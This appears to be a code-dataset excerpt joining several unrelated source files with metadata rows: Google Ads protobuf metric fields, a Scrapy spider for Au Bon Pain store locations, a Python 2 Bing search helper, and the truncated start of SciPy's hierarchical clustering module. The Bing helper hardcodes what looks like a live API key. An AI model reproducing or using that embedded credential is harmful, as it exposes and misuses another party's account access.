bounce_rate = proto.Field(proto.DOUBLE, number=212, optional=True)
clicks = proto.Field(proto.INT64, number=131, optional=True)
combined_clicks = proto.Field(proto.INT64, number=156, optional=True)
combined_clicks_per_query = proto.Field(
proto.DOUBLE, number=157, optional=True
)
combined_queries = proto.Field(proto.INT64, number=158, optional=True)
content_budget_lost_impression_share = proto.Field(
proto.DOUBLE, number=159, optional=True
)
content_impression_share = proto.Field(
proto.DOUBLE, number=160, optional=True
)
conversion_last_received_request_date_time = proto.Field(
proto.STRING, number=161, optional=True
)
conversion_last_conversion_date = proto.Field(
proto.STRING, number=162, optional=True
)
content_rank_lost_impression_share = proto.Field(
proto.DOUBLE, number=163, optional=True
)
conversions_from_interactions_rate = proto.Field(
proto.DOUBLE, number=164, optional=True
)
conversions_value = proto.Field(proto.DOUBLE, number=165, optional=True)
conversions_value_by_conversion_date = proto.Field(proto.DOUBLE, number=242)
conversions_value_per_cost = proto.Field(
proto.DOUBLE, number=166, optional=True
)
conversions_from_interactions_value_per_interaction = proto.Field(
proto.DOUBLE, number=167, optional=True
)
conversions = proto.Field(proto.DOUBLE, number=168, optional=True)
conversions_by_conversion_date = proto.Field(proto.DOUBLE, number=243)
cost_micros = proto.Field(proto.INT64, number=169, optional=True)
cost_per_all_conversions = proto.Field(
proto.DOUBLE, number=170, optional=True
)
cost_per_conversion = proto.Field(proto.DOUBLE, number=171, optional=True)
cost_per_current_model_attributed_conversion = proto.Field(
proto.DOUBLE, number=172, optional=True
)
cross_device_conversions = proto.Field(
proto.DOUBLE, number=173, optional=True
)
ctr = proto.Field(proto.DOUBLE, number=174, optional=True)
current_model_attributed_conversions = proto.Field(
proto.DOUBLE, number=175, optional=True
)
current_model_attributed_conversions_from_interactions_rate = proto.Field(
proto.DOUBLE, number=176, optional=True
)
current_model_attributed_conversions_from_interactions_value_per_interaction = proto.Field(
proto.DOUBLE, number=177, optional=True
)
current_model_attributed_conversions_value = proto.Field(
proto.DOUBLE, number=178, optional=True
)
current_model_attributed_conversions_value_per_cost = proto.Field(
proto.DOUBLE, number=179, optional=True
)
engagement_rate = proto.Field(proto.DOUBLE, number=180, optional=True)
engagements = proto.Field(proto.INT64, number=181, optional=True)
hotel_average_lead_value_micros = proto.Field(
proto.DOUBLE, number=213, optional=True
)
hotel_price_difference_percentage = proto.Field(
proto.DOUBLE, number=214, optional=True
)
hotel_eligible_impressions = proto.Field(
proto.INT64, number=215, optional=True
)
historical_creative_quality_score = proto.Field(
proto.ENUM,
number=80,
enum=quality_score_bucket.QualityScoreBucketEnum.QualityScoreBucket,
)
historical_landing_page_quality_score = proto.Field(
proto.ENUM,
number=81,
enum=quality_score_bucket.QualityScoreBucketEnum.QualityScoreBucket,
)
historical_quality_score = proto.Field(
proto.INT64, number=216, optional=True
)
historical_search_predicted_ctr = proto.Field(
proto.ENUM,
number=83,
enum=quality_score_bucket.QualityScoreBucketEnum.QualityScoreBucket,
)
gmail_forwards = proto.Field(proto.INT64, number=217, optional=True)
gmail_saves = proto.Field(proto.INT64, number=218, optional=True)
gmail_secondary_clicks = proto.Field(proto.INT64, number=219, optional=True)
impressions_from_store_reach = proto.Field(
proto.INT64, number=220, optional=True
)
impressions = proto.Field(proto.INT64, number=221, optional=True)
interaction_rate = proto.Field(proto.DOUBLE, number=222, optional=True)
interactions = proto.Field(proto.INT64, number=223, optional=True)
interaction_event_types = proto.RepeatedField(
proto.ENUM,
number=100,
enum=interaction_event_type.InteractionEventTypeEnum.InteractionEventType,
)
invalid_click_rate = proto.Field(proto.DOUBLE, number=224, optional=True)
invalid_clicks = proto.Field(proto.INT64, number=225, optional=True)
message_chats = proto.Field(proto.INT64, number=226, optional=True)
message_impressions = proto.Field(proto.INT64, number=227, optional=True)
message_chat_rate = proto.Field(proto.DOUBLE, number=228, optional=True)
mobile_friendly_clicks_percentage = proto.Field(
proto.DOUBLE, number=229, optional=True
)
organic_clicks = proto.Field(proto.INT64, number=230, optional=True)
organic_clicks_per_query = proto.Field(
proto.DOUBLE, number=231, optional=True
)
organic_impressions = proto.Field(proto.INT64, number=232, optional=True)
organic_impressions_per_query = proto.Field(
proto.DOUBLE, number=233, optional=True
)
organic_queries = proto.Field(proto.INT64, number=234, optional=True)
percent_new_visitors = proto.Field(proto.DOUBLE, number=235, optional=True)
phone_calls = proto.Field(proto.INT64, number=236, optional=True)
phone_impressions = proto.Field(proto.INT64, number=237, optional=True)
phone_through_rate = proto.Field(proto.DOUBLE, number=238, optional=True)
relative_ctr = proto.Field(proto.DOUBLE, number=239, optional=True)
search_absolute_top_impression_share = proto.Field(
proto.DOUBLE, number=136, optional=True
)
search_budget_lost_absolute_top_impression_share = proto.Field(
proto.DOUBLE, number=137, optional=True
)
search_budget_lost_impression_share = proto.Field(
proto.DOUBLE, number=138, optional=True
)
search_budget_lost_top_impression_share = proto.Field(
proto.DOUBLE, number=139, optional=True
)
search_click_share = proto.Field(proto.DOUBLE, number=140, optional=True)
search_exact_match_impression_share = proto.Field(
proto.DOUBLE, number=141, optional=True
)
search_impression_share = proto.Field(
proto.DOUBLE, number=142, optional=True
)
search_rank_lost_absolute_top_impression_share = proto.Field(
proto.DOUBLE, number=143, optional=True
)
search_rank_lost_impression_share = proto.Field(
proto.DOUBLE, number=144, optional=True
)
search_rank_lost_top_impression_share = proto.Field(
proto.DOUBLE, number=145, optional=True
)
search_top_impression_share = proto.Field(
proto.DOUBLE, number=146, optional=True
)
speed_score = proto.Field(proto.INT64, number=147, optional=True)
top_impression_percentage = proto.Field(
proto.DOUBLE, number=148, optional=True
)
valid_accelerated_mobile_pages_clicks_percentage = proto.Field(
proto.DOUBLE, number=149, optional=True
)
value_per_all_conversions = proto.Field(
proto.DOUBLE, number=150, optional=True
)
value_per_all_conversions_by_conversion_date = proto.Field(
proto.DOUBLE, number=244, optional=True
)
value_per_conversion = proto.Field(proto.DOUBLE, number=151, optional=True)
value_per_conversions_by_conversion_date = proto.Field(
proto.DOUBLE, number=245, optional=True
)
value_per_current_model_attributed_conversion = proto.Field(
proto.DOUBLE, number=152, optional=True
)
video_quartile_p100_rate = proto.Field(
proto.DOUBLE, number=132, optional=True
)
video_quartile_p25_rate = proto.Field(
proto.DOUBLE, number=133, optional=True
)
video_quartile_p50_rate = proto.Field(
proto.DOUBLE, number=134, optional=True
)
video_quartile_p75_rate = proto.Field(
proto.DOUBLE, number=135, optional=True
)
video_view_rate = proto.Field(proto.DOUBLE, number=153, optional=True)
video_views = proto.Field(proto.INT64, number=154, optional=True)
view_through_conversions = proto.Field(
proto.INT64, number=155, optional=True
)
__all__ = tuple(sorted(__protobuf__.manifest))
|
apache-2.0
| 7,806,873,479,053,634,000
| 47.843607
| 126
| 0.65375
| false
| 4.40422
| false
| false
| false
|
iandees/all-the-places
|
locations/spiders/aubonpain.py
|
1
|
2580
|
import scrapy
import re
import json
from locations.items import GeojsonPointItem
from locations.hours import OpeningHours
class AuBonPainSpider(scrapy.Spider):
name = "aubonpain"
download_delay = 0.5
allowed_domains = [
"www.aubonpain.com",
]
start_urls = (
'https://www.aubonpain.com/stores/all-stores',
)
def parse_hours(self, items):
opening_hours = OpeningHours()
for day in items:
open_time = day["Open"]
close_time = day["Close"]
if close_time == 'Closed' or open_time == 'Closed':
continue
elif close_time == 'Open 24 Hrs' or open_time == 'Open 24 Hrs':
open_time = '12:00 AM'
close_time = '12:00 AM'
elif close_time == 'Open for Special Events':
continue
opening_hours.add_range(day=day["Day"][:2],
open_time=open_time,
close_time=close_time,
time_format='%I:%M %p')
return opening_hours.as_opening_hours()
def parse_store(self, response):
ref = re.findall(r"[^(\/)]+$", response.url)[0]
scripts = "".join(response.xpath('//script/text()').extract())
lat, lon = re.search(r'.*Microsoft.Maps.Location\(([0-9.-]*),\s+([0-9-.]*)\).*', scripts).groups()
address1, address2 = response.xpath('//dt[contains(text(), "Address")]/following-sibling::dd/text()').extract()
city, state, zipcode = re.search(r'^(.*),\s+([a-z]{2})\s+([0-9]+)$', address2.strip(), re.IGNORECASE).groups()
properties = {
'addr_full': address1.strip(', '),
'phone': response.xpath('//dt[contains(text(), "Phone")]/following-sibling::dd/a/text()').extract_first(),
'city': city,
'state': state,
'postcode': zipcode,
'ref': ref,
'website': response.url,
'lat': float(lat),
'lon': float(lon),
}
hours = json.loads(re.search(r'.*var\shours\s*=\s*(.*?);.*', scripts).groups()[0])
hours = self.parse_hours(hours)
if hours:
properties['opening_hours'] = hours
yield GeojsonPointItem(**properties)
def parse(self, response):
urls = response.xpath('//section/div/div//a[contains(@href, "stores")]/@href').extract()
for url in urls:
url = url.replace('\r\n', '')
yield scrapy.Request(response.urljoin(url), callback=self.parse_store)
|
mit
| -4,718,689,655,118,514,000
| 35.857143
| 119
| 0.527907
| false
| 3.722944
| false
| false
| false
|
douglasbgatti/rango-tutorial
|
tango_with_django_project/rango/bing_search.py
|
1
|
2360
|
import json
import urllib, urllib2
BING_API_KEY = '6uAUnyT0WuPBRqv5+AZIuWrpNsKJ++t0E9Sp9DDkh3Q'
def run_query(search_terms):
# Specify the base
root_url = 'https://api.datamarket.azure.com/Bing/Search/v1/'
source = 'Web'
# Specify how many results we wish to be returned per page.
# Offset specifies where in the results list to start from.
# With results_per_page = 10 and offset = 11, this would start from page 2.
results_per_page = 10
offset = 11
# Wrap quotes around our query terms as required by the Bing API.
# The query we will then use is stored within variable query.
query = "'{0}'".format(search_terms)
query = urllib.quote(query)
# Construct the latter part of our request's URL.
# Sets the format of the response to JSON and sets other properties.
search_url = "{0}{1}?$format=json&$top={2}&$skip={3}&Query={4}".format(
root_url,
source,
results_per_page,
offset,
query)
# Setup authentication with the Bing servers.
# The username MUST be a blank string, and put in your API key!
username = ''
# Create a 'password manager' which handles authentication for us.
password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
password_mgr.add_password(None, search_url, username, BING_API_KEY)
# Create our results list which we'll populate.
results = []
try:
# Prepare for connecting to Bing's servers.
handler = urllib2.HTTPBasicAuthHandler(password_mgr)
opener = urllib2.build_opener(handler)
urllib2.install_opener(opener)
# Connect to the server and read the response generated.
response = urllib2.urlopen(search_url).read()
# Convert the string response to a Python dictionary object.
json_response = json.loads(response)
# Loop through each page returned, populating out results list.
for result in json_response['d']['results']:
results.append({
'title': result['Title'],
'link': result['Url'],
'summary': result['Description']})
# Catch a URLError exception - something went wrong when connecting!
except urllib2.URLError, e:
print "Error when querying the Bing API: ", e
# Return the list of results to the calling function.
return results
|
apache-2.0
| 702,510,726,307,883,600
| 34.238806
| 79
| 0.659322
| false
| 3.959732
| false
| false
| false
|
njwilson23/scipy
|
scipy/cluster/hierarchy.py
|
1
|
91969
|
"""
========================================================
Hierarchical clustering (:mod:`scipy.cluster.hierarchy`)
========================================================
.. currentmodule:: scipy.cluster.hierarchy
These functions cut hierarchical clusterings into flat clusterings
or find the roots of the forest formed by a cut by providing the flat
cluster ids of each observation.
.. autosummary::
:toctree: generated/
fcluster
fclusterdata
leaders
These are routines for agglomerative clustering.
.. autosummary::
:toctree: generated/
linkage
single
complete
average
weighted
centroid
median
ward
These routines compute statistics on hierarchies.
.. autosummary::
:toctree: generated/
cophenet
from_mlab_linkage
inconsistent
maxinconsts
maxdists
maxRstat
to_mlab_linkage
Routines for visualizing flat clusters.
.. autosummary::
:toctree: generated/
dendrogram
These are data structures and routines for representing hierarchies as
tree objects.
.. autosummary::
:toctree: generated/
ClusterNode
leaves_list
to_tree
These are predicates for checking the validity of linkage and
inconsistency matrices as well as for checking isomorphism of two
flat cluster assignments.
.. autosummary::
:toctree: generated/
is_valid_im
is_valid_linkage
is_isomorphic
is_monotonic
correspond
num_obs_linkage
Utility routines for plotting:
.. autosummary::
:toctree: generated/
set_link_color_palette
References
----------
.. [1] "Statistics toolbox." API Reference Documentation. The MathWorks.
http://www.mathworks.com/access/helpdesk/help/toolbox/stats/.
Accessed October 1, 2007.
.. [2] "Hierarchical clustering." API Reference Documentation.
The Wolfram Research, Inc.
http://reference.wolfram.com/mathematica/HierarchicalClustering/tutorial/
HierarchicalClustering.html.
Accessed October 1, 2007.
.. [3] Gower, JC and Ross, GJS. "Minimum Spanning Trees and Single Linkage
Cluster Analysis." Applied Statistics. 18(1): pp. 54--64. 1969.
.. [4] Ward Jr, JH. "Hierarchical grouping to optimize an objective
function." Journal of the American Statistical Association. 58(301):
pp. 236--44. 1963.
.. [5] Johnson, SC. "Hierarchical clustering schemes." Psychometrika.
32(2): pp. 241--54. 1966.
.. [6] Sneath, PH and Sokal, RR. "Numerical taxonomy." Nature. 193: pp.
855--60. 1962.
.. [7] Batagelj, V. "Comparing resemblance measures." Journal of
Classification. 12: pp. 73--90. 1995.
.. [8] Sokal, RR and Michener, CD. "A statistical method for evaluating
systematic relationships." Scientific Bulletins. 38(22):
pp. 1409--38. 1958.
.. [9] Edelbrock, C. "Mixture model tests of hierarchical clustering
algorithms: the problem of classifying everybody." Multivariate
Behavioral Research. 14: pp. 367--84. 1979.
.. [10] Jain, A., and Dubes, R., "Algorithms for Clustering Data."
Prentice-Hall. Englewood Cliffs, NJ. 1988.
.. [11] Fisher, RA "The use of multiple measurements in taxonomic
problems." Annals of Eugenics, 7(2): 179-188. 1936
* MATLAB and MathWorks are registered trademarks of The MathWorks, Inc.
* Mathematica is a registered trademark of The Wolfram Research, Inc.
"""
from __future__ import division, print_function, absolute_import
# Copyright (C) Damian Eads, 2007-2008. New BSD License.
# hierarchy.py (derived from cluster.py, http://scipy-cluster.googlecode.com)
#
# Author: Damian Eads
# Date: September 22, 2007
#
# Copyright (c) 2007, 2008, Damian Eads
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# - Redistributions of source code must retain the above
# copyright notice, this list of conditions and the
# following disclaimer.
# - Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# - Neither the name of the author nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import warnings
import numpy as np
from . import _hierarchy
import scipy.spatial.distance as distance
from scipy._lib.six import string_types
from scipy._lib.six import xrange
_cpy_non_euclid_methods = {'single': 0, 'complete': 1, 'average': 2,
'weighted': 6}
_cpy_euclid_methods = {'centroid': 3, 'median': 4, 'ward': 5}
_cpy_linkage_methods = set(_cpy_non_euclid_methods.keys()).union(
set(_cpy_euclid_methods.keys()))
__all__ = ['ClusterNode', 'average', 'centroid', 'complete', 'cophenet',
'correspond', 'dendrogram', 'fcluster', 'fclusterdata',
'from_mlab_linkage', 'inconsistent', 'is_isomorphic',
'is_monotonic', 'is_valid_im', 'is_valid_linkage', 'leaders',
'leaves_list', 'linkage', 'maxRstat', 'maxdists', 'maxinconsts',
'median', 'num_obs_linkage', 'set_link_color_palette', 'single',
'to_mlab_linkage', 'to_tree', 'ward', 'weighted', 'distance']
def _warning(s):
warnings.warn('scipy.cluster: %s' % s, stacklevel=3)
def _copy_array_if_base_present(a):
"""
Copies the array if its base points to a parent array.
"""
if a.base is not None:
return a.copy()
elif np.issubsctype(a, np.float32):
return np.array(a, dtype=np.double)
else:
return a
def _copy_arrays_if_base_present(T):
"""
Accepts a tuple of arrays T. Copies the array T[i] if its base array
points to an actual array. Otherwise, the reference is just copied.
This is useful if the arrays are being passed to a C function that
does not do proper striding.
"""
l = [_copy_array_if_base_present(a) for a in T]
return l
def _randdm(pnts):
""" Generates a random distance matrix stored in condensed form. A
pnts * (pnts - 1) / 2 sized vector is returned.
"""
if pnts >= 2:
D = np.random.rand(pnts * (pnts - 1) / 2)
else:
raise ValueError("The number of points in the distance matrix "
"must be at least 2.")
return D
def single(y):
"""
Performs single/min/nearest linkage on the condensed distance matrix ``y``
Parameters
----------
y : ndarray
The upper triangular of the distance matrix. The result of
``pdist`` is returned in this form.
Returns
-------
Z : ndarray
The linkage matrix.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='single', metric='euclidean')
def complete(y):
"""
Performs complete/max/farthest point linkage on a condensed distance matrix
Parameters
----------
y : ndarray
The upper triangular of the distance matrix. The result of
``pdist`` is returned in this form.
Returns
-------
Z : ndarray
A linkage matrix containing the hierarchical clustering. See
the ``linkage`` function documentation for more information
on its structure.
See Also
--------
linkage
"""
return linkage(y, method='complete', metric='euclidean')
def average(y):
"""
Performs average/UPGMA linkage on a condensed distance matrix
Parameters
----------
y : ndarray
The upper triangular of the distance matrix. The result of
``pdist`` is returned in this form.
Returns
-------
Z : ndarray
A linkage matrix containing the hierarchical clustering. See
the ``linkage`` function documentation for more information
on its structure.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='average', metric='euclidean')
def weighted(y):
"""
Performs weighted/WPGMA linkage on the condensed distance matrix.
See ``linkage`` for more information on the return
structure and algorithm.
Parameters
----------
y : ndarray
The upper triangular of the distance matrix. The result of
``pdist`` is returned in this form.
Returns
-------
Z : ndarray
A linkage matrix containing the hierarchical clustering. See
the ``linkage`` function documentation for more information
on its structure.
See Also
--------
linkage : for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='weighted', metric='euclidean')
def centroid(y):
"""
Performs centroid/UPGMC linkage.
See ``linkage`` for more information on the return structure
and algorithm.
The following are common calling conventions:
1. ``Z = centroid(y)``
Performs centroid/UPGMC linkage on the condensed distance
matrix ``y``. See ``linkage`` for more information on the return
structure and algorithm.
2. ``Z = centroid(X)``
Performs centroid/UPGMC linkage on the observation matrix ``X``
using Euclidean distance as the distance metric. See ``linkage``
for more information on the return structure and algorithm.
Parameters
----------
y : ndarray
A condensed or redundant distance matrix. A condensed
distance matrix is a flat array containing the upper
triangular of the distance matrix. This is the form that
``pdist`` returns. Alternatively, a collection of
m observation vectors in n dimensions may be passed as
a m by n array.
Returns
-------
Z : ndarray
A linkage matrix containing the hierarchical clustering. See
the ``linkage`` function documentation for more information
on its structure.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='centroid', metric='euclidean')
def median(y):
"""
Performs median/WPGMC linkage.
See ``linkage`` for more information on the return structure
and algorithm.
The following are common calling conventions:
1. ``Z = median(y)``
Performs median/WPGMC linkage on the condensed distance matrix
``y``. See ``linkage`` for more information on the return
structure and algorithm.
2. ``Z = median(X)``
Performs median/WPGMC linkage on the observation matrix ``X``
using Euclidean distance as the distance metric. See linkage
for more information on the return structure and algorithm.
Parameters
----------
y : ndarray
A condensed or redundant distance matrix. A condensed
distance matrix is a flat array containing the upper
triangular of the distance matrix. This is the form that
``pdist`` returns. Alternatively, a collection of
m observation vectors in n dimensions may be passed as
a m by n array.
Returns
-------
Z : ndarray
The hierarchical clustering encoded as a linkage matrix.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='median', metric='euclidean')
def ward(y):
"""
Performs Ward's linkage on a condensed or redundant distance matrix.
See linkage for more information on the return structure
and algorithm.
The following are common calling conventions:
1. ``Z = ward(y)``
Performs Ward's linkage on the condensed distance matrix ``Z``. See
linkage for more information on the return structure and
algorithm.
2. ``Z = ward(X)``
Performs Ward's linkage on the observation matrix ``X`` using
Euclidean distance as the distance metric. See linkage for more
information on the return structure and algorithm.
Parameters
----------
y : ndarray
A condensed or redundant distance matrix. A condensed
distance matrix is a flat array containing the upper
triangular of the distance matrix. This is the form that
``pdist`` returns. Alternatively, a collection of
m observation vectors in n dimensions may be passed as
a m by n array.
Returns
-------
Z : ndarray
The hierarchical clustering encoded as a linkage matrix.
See Also
--------
linkage: for advanced creation of hierarchical clusterings.
"""
return linkage(y, method='ward', metric='euclidean')
def linkage(y, method='single', metric='euclidean'):
"""
Performs hierarchical/agglomerative clustering on the condensed
distance matrix y.
y must be a :math:`{n \\choose 2}` sized
vector where n is the number of original observations paired
in the distance matrix. The behavior of this function is very
similar to the MATLAB linkage function.
An :math:`(n-1)` by 4 matrix ``Z`` is returned. At the
:math:`i`-th iteration, clusters with indices ``Z[i, 0]`` and
``Z[i, 1]`` are combined to form cluster :math:`n + i`. A
cluster with an index less than :math:`n` corresponds to one of
the :math:`n` original observations. The distance between
clusters ``Z[i, 0]`` and ``Z[i, 1]`` is given by ``Z[i, 2]``. The
fourth value ``Z[i, 3]`` represents the number of original
observations in the newly formed cluster.
The following linkage methods are used to compute the distance
:math:`d(s, t)` between two clusters :math:`s` and
:math:`t`. The algorithm begins with a forest of clusters that
have yet to be used in the hierarchy being formed. When two
clusters :math:`s` and :math:`t` from this forest are combined
into a single cluster :math:`u`, :math:`s` and :math:`t` are
removed from the forest, and :math:`u` is added to the
forest. When only one cluster remains in the forest, the algorithm
stops, and this cluster becomes the root.
A distance matrix is maintained at each iteration. The ``d[i,j]``
entry corresponds to the distance between cluster :math:`i` and
:math:`j` in the original forest.
At each iteration, the algorithm must update the distance matrix
to reflect the distance of the newly formed cluster u with the
remaining clusters in the forest.
Suppose there are :math:`|u|` original observations
:math:`u[0], \\ldots, u[|u|-1]` in cluster :math:`u` and
:math:`|v|` original objects :math:`v[0], \\ldots, v[|v|-1]` in
cluster :math:`v`. Recall :math:`s` and :math:`t` are
combined to form cluster :math:`u`. Let :math:`v` be any
remaining cluster in the forest that is not :math:`u`.
The following are methods for calculating the distance between the
newly formed cluster :math:`u` and each :math:`v`.
* method='single' assigns
.. math::
d(u,v) = \\min(dist(u[i],v[j]))
for all points :math:`i` in cluster :math:`u` and
:math:`j` in cluster :math:`v`. This is also known as the
Nearest Point Algorithm.
* method='complete' assigns
.. math::
d(u, v) = \\max(dist(u[i],v[j]))
for all points :math:`i` in cluster u and :math:`j` in
cluster :math:`v`. This is also known by the Farthest Point
Algorithm or Voor Hees Algorithm.
* method='average' assigns
.. math::
d(u,v) = \\sum_{ij} \\frac{d(u[i], v[j])}
{(|u|*|v|)}
for all points :math:`i` and :math:`j` where :math:`|u|`
and :math:`|v|` are the cardinalities of clusters :math:`u`
and :math:`v`, respectively. This is also called the UPGMA
algorithm.
* method='weighted' assigns
.. math::
d(u,v) = (dist(s,v) + dist(t,v))/2
where cluster u was formed with cluster s and t and v
is a remaining cluster in the forest. (also called WPGMA)
* method='centroid' assigns
.. math::
dist(s,t) = ||c_s-c_t||_2
where :math:`c_s` and :math:`c_t` are the centroids of
clusters :math:`s` and :math:`t`, respectively. When two
clusters :math:`s` and :math:`t` are combined into a new
cluster :math:`u`, the new centroid is computed over all the
original objects in clusters :math:`s` and :math:`t`. The
distance then becomes the Euclidean distance between the
centroid of :math:`u` and the centroid of a remaining cluster
:math:`v` in the forest. This is also known as the UPGMC
algorithm.
* method='median' assigns :math:`d(s,t)` like the ``centroid``
method. When two clusters :math:`s` and :math:`t` are combined
into a new cluster :math:`u`, the average of centroids s and t
give the new centroid :math:`u`. This is also known as the
WPGMC algorithm.
* method='ward' uses the Ward variance minimization algorithm.
The new entry :math:`d(u,v)` is computed as follows,
.. math::
d(u,v) = \\sqrt{\\frac{|v|+|s|}
{T}d(v,s)^2
+ \\frac{|v|+|t|}
{T}d(v,t)^2
- \\frac{|v|}
{T}d(s,t)^2}
where :math:`u` is the newly joined cluster consisting of
clusters :math:`s` and :math:`t`, :math:`v` is an unused
cluster in the forest, :math:`T=|v|+|s|+|t|`, and
:math:`|*|` is the cardinality of its argument. This is also
known as the incremental algorithm.
Warning: When the minimum distance pair in the forest is chosen, there
may be two or more pairs with the same minimum distance. This
implementation may chose a different minimum than the MATLAB
version.
Parameters
----------
y : ndarray
A condensed or redundant distance matrix. A condensed distance matrix
is a flat array containing the upper triangular of the distance matrix.
This is the form that ``pdist`` returns. Alternatively, a collection of
:math:`m` observation vectors in n dimensions may be passed as an
:math:`m` by :math:`n` array.
method : str, optional
The linkage algorithm to use. See the ``Linkage Methods`` section below
for full descriptions.
metric : str or function, optional
The distance metric to use in the case that y is a collection of
observation vectors; ignored otherwise. See the ``distance.pdist``
function for a list of valid distance metrics. A custom distance
function can also be used. See the ``distance.pdist`` function for
details.
Returns
-------
Z : ndarray
The hierarchical clustering encoded as a linkage matrix.
"""
if not isinstance(method, string_types):
raise TypeError("Argument 'method' must be a string.")
y = _convert_to_double(np.asarray(y, order='c'))
s = y.shape
if len(s) == 1:
distance.is_valid_y(y, throw=True, name='y')
d = distance.num_obs_y(y)
if method not in _cpy_non_euclid_methods:
raise ValueError("Valid methods when the raw observations are "
"omitted are 'single', 'complete', 'weighted', "
"and 'average'.")
# Since the C code does not support striding using strides.
[y] = _copy_arrays_if_base_present([y])
Z = np.zeros((d - 1, 4))
if method == 'single':
_hierarchy.slink(y, Z, int(d))
else:
_hierarchy.linkage(y, Z, int(d),
int(_cpy_non_euclid_methods[method]))
elif len(s) == 2:
X = y
n = s[0]
if method not in _cpy_linkage_methods:
raise ValueError('Invalid method: %s' % method)
if method in _cpy_non_euclid_methods:
dm = distance.pdist(X, metric)
Z = np.zeros((n - 1, 4))
if method == 'single':
_hierarchy.slink(dm, Z, n)
else:
_hierarchy.linkage(dm, Z, n,
int(_cpy_non_euclid_methods[method]))
elif method in _cpy_euclid_methods:
if metric != 'euclidean':
raise ValueError(("Method '%s' requires the distance metric "
"to be euclidean") % method)
dm = distance.pdist(X, metric)
Z = np.zeros((n - 1, 4))
_hierarchy.linkage(dm, Z, n,
int(_cpy_euclid_methods[method]))
return Z
class ClusterNode:
"""
A tree node class for representing a cluster.
Leaf nodes correspond to original observations, while non-leaf nodes
correspond to non-singleton clusters.
The to_tree function converts a matrix returned by the linkage
function into an easy-to-use tree representation.
See Also
--------
to_tree : for converting a linkage matrix ``Z`` into a tree object.
"""
def __init__(self, id, left=None, right=None, dist=0, count=1):
if id < 0:
raise ValueError('The id must be non-negative.')
if dist < 0:
raise ValueError('The distance must be non-negative.')
if (left is None and right is not None) or \
(left is not None and right is None):
raise ValueError('Only full or proper binary trees are permitted.'
' This node has one child.')
if count < 1:
raise ValueError('A cluster must contain at least one original '
'observation.')
self.id = id
self.left = left
self.right = right
self.dist = dist
if self.left is None:
self.count = count
else:
self.count = left.count + right.count
def get_id(self):
"""
The identifier of the target node.
For ``0 <= i < n``, `i` corresponds to original observation i.
For ``n <= i < 2n-1``, `i` corresponds to non-singleton cluster formed
at iteration ``i-n``.
Returns
-------
id : int
The identifier of the target node.
"""
return self.id
def get_count(self):
"""
The number of leaf nodes (original observations) belonging to
the cluster node nd. If the target node is a leaf, 1 is
returned.
Returns
-------
get_count : int
The number of leaf nodes below the target node.
"""
return self.count
def get_left(self):
"""
Return a reference to the left child tree object.
Returns
-------
left : ClusterNode
The left child of the target node. If the node is a leaf,
None is returned.
"""
return self.left
def get_right(self):
"""
Returns a reference to the right child tree object.
Returns
-------
right : ClusterNode
The left child of the target node. If the node is a leaf,
None is returned.
"""
return self.right
def is_leaf(self):
"""
Returns True if the target node is a leaf.
Returns
-------
leafness : bool
True if the target node is a leaf node.
"""
return self.left is None
def pre_order(self, func=(lambda x: x.id)):
"""
Performs pre-order traversal without recursive function calls.
When a leaf node is first encountered, ``func`` is called with
the leaf node as its argument, and its result is appended to
the list.
For example, the statement::
ids = root.pre_order(lambda x: x.id)
returns a list of the node ids corresponding to the leaf nodes
of the tree as they appear from left to right.
Parameters
----------
func : function
Applied to each leaf ClusterNode object in the pre-order traversal.
Given the i'th leaf node in the pre-ordeR traversal ``n[i]``, the
result of func(n[i]) is stored in L[i]. If not provided, the index
of the original observation to which the node corresponds is used.
Returns
-------
L : list
The pre-order traversal.
"""
# Do a preorder traversal, caching the result. To avoid having to do
# recursion, we'll store the previous index we've visited in a vector.
n = self.count
curNode = [None] * (2 * n)
lvisited = set()
rvisited = set()
curNode[0] = self
k = 0
preorder = []
while k >= 0:
nd = curNode[k]
ndid = nd.id
if nd.is_leaf():
preorder.append(func(nd))
k = k - 1
else:
if ndid not in lvisited:
curNode[k + 1] = nd.left
lvisited.add(ndid)
k = k + 1
elif ndid not in rvisited:
curNode[k + 1] = nd.right
rvisited.add(ndid)
k = k + 1
# If we've visited the left and right of this non-leaf
# node already, go up in the tree.
else:
k = k - 1
return preorder
_cnode_bare = ClusterNode(0)
_cnode_type = type(ClusterNode)
def to_tree(Z, rd=False):
"""
Converts a hierarchical clustering encoded in the matrix ``Z`` (by
linkage) into an easy-to-use tree object.
The reference r to the root ClusterNode object is returned.
Each ClusterNode object has a left, right, dist, id, and count
attribute. The left and right attributes point to ClusterNode objects
that were combined to generate the cluster. If both are None then
the ClusterNode object is a leaf node, its count must be 1, and its
distance is meaningless but set to 0.
Note: This function is provided for the convenience of the library
user. ClusterNodes are not used as input to any of the functions in this
library.
Parameters
----------
Z : ndarray
The linkage matrix in proper form (see the ``linkage``
function documentation).
rd : bool, optional
When False, a reference to the root ClusterNode object is
